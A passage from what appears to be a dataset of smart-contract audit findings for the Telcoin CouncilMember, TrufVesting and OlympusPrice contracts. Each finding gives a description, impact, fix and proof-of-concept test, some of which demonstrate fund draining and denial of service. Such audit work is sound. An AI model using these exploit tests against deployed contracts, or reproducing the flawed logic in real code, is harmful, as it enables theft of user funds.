is currently NOT stored in `CouncilMember.sol`, so it will need to be stored (my example shows a new `actualStream` variable)\\n```\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n// Remove the line below\\n _target, \\n// Add the line below\\n actualStream\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\nчHigh. ALL withdrawals from the Sablier stream will revert, effectively causing a DoS in the _retrieve() function. Because the _retrieve() function is called in all the main protocol functions, this vulnerability essentially prevents the protocol from ever functioning correctly.\\nProof of Concept\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport {Test, console2} from \"forge-std/Test.sol\";\\nimport {SablierV2Comptroller} from \"@sablier/v2-core/src/SablierV2Comptroller.sol\";\\nimport {SablierV2NFTDescriptor} from \"@sablier/v2-core/src/SablierV2NFTDescriptor.sol\";\\nimport {SablierV2LockupLinear} from \"@sablier/v2-core/src/SablierV2LockupLinear.sol\";\\nimport {ISablierV2Comptroller} from \"@sablier/v2-core/src/interfaces/ISablierV2Comptroller.sol\";\\nimport {ISablierV2NFTDescriptor} from \"@sablier/v2-core/src/interfaces/ISablierV2NFTDescriptor.sol\";\\nimport {ISablierV2LockupLinear} from \"@sablier/v2-core/src/interfaces/ISablierV2LockupLinear.sol\";\\n\\nimport {CouncilMember, IPRBProxy} from \"../src/core/CouncilMember.sol\";\\nimport {TestTelcoin} from \"./mock/TestTelcoin.sol\";\\nimport {MockProxyTarget} from \"./mock/MockProxyTarget.sol\";\\nimport {PRBProxy} from \"./mock/MockPRBProxy.sol\";\\nimport {PRBProxyRegistry} from \"./mock/MockPRBProxyRegistry.sol\";\\n\\nimport {UD60x18} from \"@prb/math/src/UD60x18.sol\";\\nimport {LockupLinear, Broker, IERC20} from \"@sablier/v2-core/src/types/DataTypes.sol\";\\nimport {IERC20 as IERC20OZ} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\n\\ncontract PocTest is Test {\\n\\n ////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n ////////////////////////////////////////////////////////////////\\n\\n bytes32 public constant GOVERNANCE_COUNCIL_ROLE =\\n keccak256(\"GOVERNANCE_COUNCIL_ROLE\");\\n bytes32 public constant SUPPORT_ROLE = keccak256(\"SUPPORT_ROLE\");\\n\\n ////////////////////////////////////////////////////////////////\\n // STORAGE //\\n ////////////////////////////////////////////////////////////////\\n\\n /// @notice Poc Users\\n address public sablierAdmin;\\n address public user;\\n\\n /// @notice Sablier contracts\\n SablierV2Comptroller public comptroller;\\n SablierV2NFTDescriptor public nftDescriptor;\\n SablierV2LockupLinear public lockupLinear;\\n\\n /// @notice Telcoin contracts\\n PRBProxyRegistry public proxyRegistry;\\n PRBProxy public stream;\\n MockProxyTarget public target;\\n CouncilMember public councilMember;\\n TestTelcoin public telcoin;\\n\\n function setUp() public {\\n // Setup users\\n _setupUsers();\\n\\n // Deploy token\\n telcoin = new TestTelcoin(address(this));\\n\\n // Deploy Sablier \\n _deploySablier();\\n\\n // Deploy council member\\n councilMember = new CouncilMember();\\n\\n // Setup stream\\n _setupStream();\\n\\n // Setup the council member\\n _setupCouncilMember();\\n }\\n\\n function testPoc() public {\\n // Step 1: Mint council NFT to user\\n councilMember.mint(user);\\n assertEq(councilMember.balanceOf(user), 1);\\n\\n // Step 2: Forward time 1 days\\n vm.warp(block.timestamp + 1 days);\\n \\n // Step 3: All functions calling _retrieve() (mint(), burn(), removeFromOffice()) will fail\\n vm.expectRevert(abi.encodeWithSignature(\"PRBProxy_ExecutionReverted()\")); \\n councilMember.mint(user);\\n }\\n\\n function _setupUsers() internal {\\n sablierAdmin = makeAddr(\"sablierAdmin\");\\n user = makeAddr(\"user\");\\n }\\n\\n function _deploySablier() internal {\\n // Deploy protocol\\n comptroller = new SablierV2Comptroller(sablierAdmin);\\n nftDescriptor = new SablierV2NFTDescriptor();\\n lockupLinear = new SablierV2LockupLinear(\\n sablierAdmin,\\n ISablierV2Comptroller(address(comptroller)),\\n ISablierV2NFTDescriptor(address(nftDescriptor))\\n );\\n }\\n\\n function _setupStream() internal {\\n\\n // Deploy proxies\\n proxyRegistry = new PRBProxyRegistry();\\n stream = PRBProxy(payable(address(proxyRegistry.deploy())));\\n target = new MockProxyTarget();\\n\\n // Setup stream\\n LockupLinear.Durations memory durations = LockupLinear.Durations({\\n cliff: 0,\\n total: 1 weeks\\n });\\n\\n UD60x18 fee = UD60x18.wrap(0);\\n\\n Broker memory broker = Broker({account: address(0), fee: fee});\\n LockupLinear.CreateWithDurations memory params = LockupLinear\\n .CreateWithDurations({\\n sender: address(this),\\n recipient: address(stream),\\n totalAmount: 100e18,\\n asset: IERC20(address(telcoin)),\\n cancelable: false,\\n transferable: false,\\n durations: durations,\\n broker: broker\\n });\\n\\n bytes memory data = abi.encodeWithSelector(target.createWithDurations.selector, address(lockupLinear), params, \"\");\\n\\n // Create the stream through the PRBProxy\\n telcoin.approve(address(stream), type(uint256).max);\\n bytes memory response = stream.execute(address(target), data);\\n assertEq(lockupLinear.ownerOf(1), address(stream));\\n }\\n\\n function _setupCouncilMember() internal {\\n // Initialize\\n councilMember.initialize(\\n IERC20OZ(address(telcoin)),\\n \"Test Council\",\\n \"TC\",\\n IPRBProxy(address(stream)), // stream_\\n address(target), // target_\\n 1, // id_\\n address(lockupLinear)\\n );\\n\\n // Grant roles\\n councilMember.grantRole(GOVERNANCE_COUNCIL_ROLE, address(this));\\n councilMember.grantRole(SUPPORT_ROLE, address(this));\\n }\\n \\n}\\n```\\nч```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n -CouncilMember:burn renders the contract inoperable after the first executionчhighчThe CouncilMember contract suffers from a critical vulnerability that misaligns the balances array after a successful burn, rendering the contract inoperable.\\nThe root cause of the vulnerability is that the `burn` function incorrectly manages the `balances` array, shortening it by one each time an ERC721 token is burned while the latest minted NFT still withholds its unique `tokenId` which maps to the previous value of `balances.length`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n\\nThis misalignment between existing `tokenIds` and the `balances` array results in several critical impacts:\\nHolders with `tokenId` greater than the length of balances cannot claim.\\nSubsequent burns of `tokenId` greater than balances length will revert.\\nSubsequent mint operations will revert due to `tokenId` collision. As `totalSupply` now collides with the existing `tokenId`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function mint(\\n // rest of code\\n balances.push(0);\\n _mint(newMember, totalSupply());// <= FOUND\\n }\\n```\\n\\nThis mismanagement creates a cascading effect, collectively rendering the contract inoperable. Following POC will demonstrate the issue more clearly in codes.\\nPOC\\nRun `git apply` on the following patch then run `npx hardhat test` to run the POC.\\n```\\ndiff --git a/telcoin-audit/test/sablier/CouncilMember.test.ts b/telcoin-audit/test/sablier/CouncilMember.test.ts\\nindex 675b89d..ab96b08 100644\\n--- a/telcoin-audit/test/sablier/CouncilMember.test.ts\\n+++ b/telcoin-audit/test/sablier/CouncilMember.test.ts\\n@@ -1,13 +1,14 @@\\n import { expect } from \"chai\";\\n import { ethers } from \"hardhat\";\\n import { SignerWithAddress } from \"@nomicfoundation/hardhat-ethers/signers\";\\n-import { CouncilMember, TestTelcoin, TestStream } from \"../../typechain-types\";\\n+import { CouncilMember, TestTelcoin, TestStream, ERC721Upgradeable__factory } from \"../../typechain-types\";\\n \\n describe(\"CouncilMember\", () => {\\n let admin: SignerWithAddress;\\n let support: SignerWithAddress;\\n let member: SignerWithAddress;\\n let holder: SignerWithAddress;\\n+ let lastCouncilMember: SignerWithAddress;\\n let councilMember: CouncilMember;\\n let telcoin: TestTelcoin;\\n let stream: TestStream;\\n@@ -18,7 +19,7 @@ describe(\"CouncilMember\", () => {\\n let supportRole: string = ethers.keccak256(ethers.toUtf8Bytes(\"SUPPORT_ROLE\"));\\n \\n beforeEach(async () => {\\n- [admin, support, member, holder, target] = await ethers.getSigners();\\n+ [admin, support, member, holder, target, lastCouncilMember] = await ethers.getSigners();\\n \\n const TestTelcoinFactory = await ethers.getContractFactory(\"TestTelcoin\", admin);\\n telcoin = await TestTelcoinFactory.deploy(admin.address);\\n@@ -182,6 +183,22 @@ describe(\"CouncilMember\", () => {\\n it(\"the correct removal is made\", async () => {\\n await expect(councilMember.burn(1, support.address)).emit(councilMember, \"Transfer\");\\n });\\n+ it.only(\"inoperable contract after burn\", async () => {\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.not.reverted;\\n+\\n+ // This 1st burn will cause contract inoperable due to tokenId & balances misalignment\\n+ await expect(councilMember.burn(1, support.address)).emit(councilMember, \"Transfer\");\\n+\\n+ // Impact 1. holder with tokenId > balances length cannot claim\\n+ await expect(councilMember.connect(lastCouncilMember).claim(3, 1)).to.revertedWithPanic(\"0x32\"); // @audit-info 0x32: Array accessed at an out-of-bounds or negative index\\n+\\n+ // Impact 2. subsequent burns of tokenId > balances length will revert\\n+ await expect(councilMember.burn(3, lastCouncilMember.address)).to.revertedWithPanic(\"0x32\"); \\n+\\n+ // Impact 3. subsequent mint will revert due to tokenId collision\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.revertedWithCustomError(councilMember, \"ERC721InvalidSender\");\\n+\\n+ });\\n });\\n });\\n \\n```\\n\\nResult\\nCouncilMember mutative burn Success ✔ inoperable contract after burn (90ms) 1 passing (888ms)\\nThe Passing execution of the POC confirmed that operations such as `claim`, `burn` & `mint` were all reverted which make the contract inoperable.чIt is recommended to avoid popping out balances to keep alignment with uniquely minted tokenId. Alternatively, consider migrating to ERC1155, which inherently manages a built-in balance for each NFT.чThe severity of the vulnerability is high due to the high likelihood of occurence and the critical impacts on the contract's operability and token holders' ability to interact with their assets.ч```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n -Users can fully drain the `TrufVesting` contractчhighчDue to flaw in the logic in `claimable` any arbitrary user can drain all the funds within the contract.\\nA user's claimable is calculated in the following way:\\nUp until start time it is 0.\\nBetween start time and cliff time it's equal to `initialRelease`.\\nAfter cliff time, it linearly increases until the full period ends.\\nHowever, if we look at the code, when we are at stage 2., it always returns `initialRelease`, even if we've already claimed it. This would allow for any arbitrary user to call claim as many times as they wish and every time they'd receive `initialRelease`. Given enough iterations, any user can drain the contract.\\n```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n\\n```\\n function claim(address user, uint256 categoryId, uint256 vestingId, uint256 claimAmount) public {\\n if (user != msg.sender && (!categories[categoryId].adminClaimable || msg.sender != owner())) {\\n revert Forbidden(msg.sender);\\n }\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (claimAmount == type(uint256).max) {\\n claimAmount = claimableAmount;\\n } else if (claimAmount > claimableAmount) {\\n revert ClaimAmountExceed();\\n }\\n if (claimAmount == 0) {\\n revert ZeroAmount();\\n }\\n\\n categories[categoryId].totalClaimed += claimAmount;\\n userVestings[categoryId][vestingId][user].claimed += claimAmount;\\n trufToken.safeTransfer(user, claimAmount);\\n\\n emit Claimed(categoryId, vestingId, user, claimAmount);\\n }\\n```\\nчchange the if check to the following\\n```\\n if (startTime > block.timestamp) {\\n if (initialRelease > userVesting.claimed) {\\n return initialRelease - userVesting.claimed;\\n }\\n else { return 0; } \\n }\\n```\\n\\nPoC\\n```\\n function test_cliffVestingDrain() public { \\n _setupVestingPlan();\\n uint256 categoryId = 2;\\n uint256 vestingId = 0;\\n uint256 stakeAmount = 10e18;\\n uint256 duration = 30 days;\\n\\n vm.startPrank(owner);\\n \\n vesting.setUserVesting(categoryId, vestingId, alice, 0, stakeAmount);\\n\\n vm.warp(block.timestamp + 11 days); // warping 11 days, because initial release period is 10 days\\n // and cliff is at 20 days. We need to be in the middle \\n vm.startPrank(alice);\\n assertEq(trufToken.balanceOf(alice), 0);\\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n \\n uint256 balance = trufToken.balanceOf(alice);\\n assertEq(balance, stakeAmount * 5 / 100); // Alice should be able to have claimed just 5% of the vesting \\n\\n for (uint i; i < 39; i++ ){ \\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n }\\n uint256 newBalance = trufToken.balanceOf(alice); // Alice has claimed 2x the amount she was supposed to be vested. \\n assertEq(newBalance, stakeAmount * 2); // In fact she can keep on doing this to drain the whole contract\\n }\\n```\\nчAny user can drain the contractч```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n -`cancelVesting` will potentially not give users unclaimed, vested funds, even if giveUnclaimed = trueчhighчThe purpose of `cancelVesting` is to cancel a vesting grant and potentially give users unclaimed but vested funds in the event that `giveUnclaimed = true`. However, due to a bug, in the event that the user had staked / locked funds, they will potentially not received the unclaimed / vested funds even if `giveUnclaimed = true`.\\nHere's the cancelVesting function in TrufVesting:\\n```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n\\nFirst, consider the following code:\\n```\\nuint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\nif (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n}\\n```\\n\\nFirst the locked / staked funds will essentially be un-staked. The following line of code: `userVesting.locked = 0;` exists because there is a call to `uint256 claimableAmount = claimable(categoryId, vestingId, user);` afterwards, and in the event that there were locked funds that were unstaked, these funds should now potentially be `claimable` if they are vested (but if locked is not set to 0, then the vested funds will potentially not be deemed `claimable` by the `claimable` function).\\nHowever, because `userVesting` is `memory` rather than `storage`, this doesn't end up happening (so `userVesting.locked = 0;` is actually a bug). This means that if a user is currently staking all their funds (so all their funds are locked), and `cancelVesting` is called, then they will not receive any funds back even if `giveUnclaimed = true`. This is because the `claimable` function (which will access the unaltered userVestings[categoryId][vestingId][user]) will still think that all the funds are currently locked, even though they are not as they have been forcibly unstaked.чChange `userVesting.locked = 0;` to `userVestings[categoryId][vestingId][user].locked = 0;`чWhen `cancelVesting` is called, a user may not receive their unclaimed, vested funds.ч```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n -When migrating the owner users will lose their rewardsчmediumчWhen a user migrates the owner due to a lost private key, the rewards belonging to the previous owner remain recorded in their account and cannot be claimed, resulting in the loss of user rewards.\\nAccording to the documentation, `migrateUser()` is used when a user loses their private key to migrate the old vesting owner to a new owner.\\n```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n\\nIn this function, the protocol calls `migrateVestingLock()` to obtain a new ID.\\n```\\n if (lockupId != 0) {\\n newLockupId = veTRUF.migrateVestingLock(prevUser, newUser, lockupId - 1) + 1;\\n lockupIds[categoryId][vestingId][newUser] = newLockupId;\\n delete lockupIds[categoryId][vestingId][prevUser];\\n\\n newVesting.locked = prevVesting.locked;\\n }\\n```\\n\\nHowever, in the `migrateVestingLock()` function, the protocol calls `stakingRewards.withdraw()` to withdraw the user's stake, burning points. In the `withdraw()` function, the protocol first calls `updateReward()` to update the user's rewards and records them in the user's account.\\n```\\n function withdraw(address user, uint256 amount) public updateReward(user) onlyOperator {\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n _totalSupply -= amount;\\n _balances[user] -= amount;\\n emit Withdrawn(user, amount);\\n }\\n```\\n\\nHowever, `stakingRewards.withdraw()` is called with the old owner as a parameter, meaning that the rewards will be updated on the old account.\\n```\\n uint256 points = oldLockup.points;\\n stakingRewards.withdraw(oldUser, points);\\n _burn(oldUser, points);\\n```\\n\\nAs mentioned earlier, the old owner has lost their private key and cannot claim the rewards, resulting in the loss of these rewards.чWhen migrating the owner, the rewards belonging to the previous owner should be transferred to the new owner.чThe user's rewards are lostч```\\n /**\\n * @notice Migrate owner of vesting. Used when user lost his private key\\n * @dev Only admin can migrate users vesting\\n * @param categoryId Category id\\n * @param vestingId Vesting id\\n * @param prevUser previous user address\\n * @param newUser new user address\\n */\\n```\\n -Ended locks can be extendedчmediumчWhen a lock period ends, it can be extended. If the new extension 'end' is earlier than the current block.timestamp, the user will have a lock that can be unstaked at any time.\"\\nWhen the lock period ends, the owner of the expired lock can extend it to set a new lock end that is earlier than the current block.timestamp. By doing so, the lock owner can create a lock that is unstakeable at any time.\\nThis is doable because there are no checks in the extendLock function that checks whether the lock is already ended or not.\\nPoC:\\n```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\nчDo not let extension of locks that are already ended.чThe owner of the lock will achieve points that he can unlock anytime. This is clearly a gaming of the system and shouldn't be acceptable behaviour. A locker having a \"lock\" that can be unstaked anytime will be unfair for the other lockers. Considering this, I'll label this as high.ч```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, \"lock is ended\");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n -OlympusPrice.v2.sol#storePrice: The moving average prices are used recursively for the calculation of the moving average price.чhighчThe moving average prices should be calculated by only oracle feed prices. But now, they are calculated by not only oracle feed prices but also moving average price recursively.\\nThat is, the `storePrice` function uses the current price obtained from the `_getCurrentPrice` function to update the moving average price. However, in the case of `asset.useMovingAverage = true`, the `_getCurrentPrice` function computes the current price using the moving average price.\\nThus, the moving average prices are used recursively to calculate moving average price, so the current prices will be obtained incorrectly.\\n`OlympusPrice.v2.sol#storePrice` function is the following.\\n```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n\\n`L319` obtain the current price for the asset by calling the `_getCurrentPrice` function and use it to update `asset.cumulativeObs` in `L331`. The `_getCurrentPrice` function is the following.\\n```\\n function _getCurrentPrice(address asset_) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = asset.useMovingAverage\\n ? new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nAs can be seen, when `asset.useMovingAverage = true`, the `_getCurrentPrice` calculates the current `price` `price` using the moving average `price` obtained by `asset.cumulativeObs / asset.numObservations` in `L160`.\\nSo the `price` value in `L331` is obtained from not only oracle feed prices but also moving average `price`. Then, `storePrice` calculates the cumulative observations asset.cumulativeObs = asset.cumulativeObs + `price` - oldestPrice using the `price` which is obtained incorrectly above.\\nThus, the moving average prices are used recursively for the calculation of the moving average price.чWhen updating the current price and cumulative observations in the `storePrice` function, it should use the oracle price feeds and not include the moving average prices. So, instead of using the `asset.useMovingAverage` state variable in the `_getCurrentPrice` function, we can add a `useMovingAverage` parameter as the following.\\n```\\n function _getCurrentPrice(address asset_, bool useMovingAverage) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = useMovingAverage\\n ? new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nThen we should set `useMovingAverage = false` to call `_getCurrentPrice` function only in the `storePrice` function. In other cases, we should set `useMovingAverage = asset.useMovingAverage` to call `_getCurrentPrice` function.чNow the moving average prices are used recursively for the calculation of the moving average price. Then, the moving average prices become more smoothed than the intention of the administrator. That is, even when the actual price fluctuations are large, the price fluctuations of `_getCurrentPrice` function will become too small.\\nMoreover, even though all of the oracle price feeds fails, the moving averge prices will be calculated only by moving average prices.\\nThus the current prices will become incorrect. If `_getCurrentPrice` function value is miscalculated, it will cause fatal damage to the protocol.ч```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n 